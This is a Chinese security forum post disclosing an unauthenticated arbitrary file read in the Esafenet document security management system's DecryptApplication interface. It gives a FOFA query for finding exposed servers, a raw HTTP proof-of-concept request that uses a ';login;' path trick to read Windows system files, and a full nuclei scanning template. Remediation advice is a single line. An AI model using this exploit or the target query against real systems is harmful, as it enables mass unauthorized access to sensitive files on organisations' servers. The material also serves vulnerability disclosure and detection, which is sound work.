论坛首页 > 技术文章投稿区 > 漏洞文章

亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞

我是大白   ·   发表于 2024-03-14 21:12:52   ·   漏洞文章

亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞

漏洞描述

亿赛通电子文档安全管理系统 DecryptApplication 接口处任意文件读取漏洞,未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息,导致系统处于极不安全的状态。

产品界面

fofa语法

app="亿赛通-电子文档安全管理系统"

POC

  1. GET /CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=test1111 HTTP/1.1
  2. Host:

nuclei验证

  1. id: yisaitong-DecryptApplication-fileread
  3. info:
  4.   name: 亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞
  5.   author: nobody
  6.   severity: high
  7.   description: |
  8.     亿赛通电子文档安全管理系统 DecryptApplication 接口处任意文件读取漏洞,未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息
  9.   impact: |
  10.     未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息
  11.   remediation: |
  12.     升级版本,打补丁
  13.   metadata:
  14.     verified: true
  15.     max-request: 3
  16.     fofa-query: app="亿赛通-电子文档安全管理系统"
  17.   tags: fileread
  19. requests:
  20.   - raw:
  21.       - |
  22.         GET /CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=testtest HTTP/1.1
  23.         Host: {{Hostname}}
  25.     matchers:
  26.       - type: dsl
  27.         dsl:
  28.           - status_code == 200 && contains_all(body,"[files]")

修复建议

  • 建议升级到最新版本或打补丁

打赏我,让我更有动力~

0 条回复   |  直到 9个月前 | 603 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.